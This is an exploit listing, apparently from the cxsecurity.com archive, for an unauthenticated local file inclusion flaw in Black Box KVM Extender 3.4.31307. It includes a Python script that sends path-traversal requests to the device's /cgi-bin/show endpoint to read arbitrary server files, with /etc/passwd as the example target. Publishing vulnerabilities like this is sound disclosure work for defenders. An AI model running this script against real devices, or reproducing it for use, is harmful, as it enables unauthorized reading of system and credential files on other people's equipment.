Black Box Kvm Extender 3.4.31307 Local File Inclusion

2021.07.07
Credit: Ferhat Cil
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion # Date: 05.07.2021 # Exploit Author: Ferhat Çil # Vendor Homepage: http://www.blackbox.com/ # Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm # Version: 3.4.31307 # Category: Webapps # Tested on: Linux # Description: Any user can read files from the server # without authentication due to an existing LFI in the following path: # http://target//cgi-bin/show?page=FilePath import requests import sys if name == 'main': if len(sys.argv) == 3: url = sys.argv[1] payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] r = requests.get(payload) print(r.text) else: print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top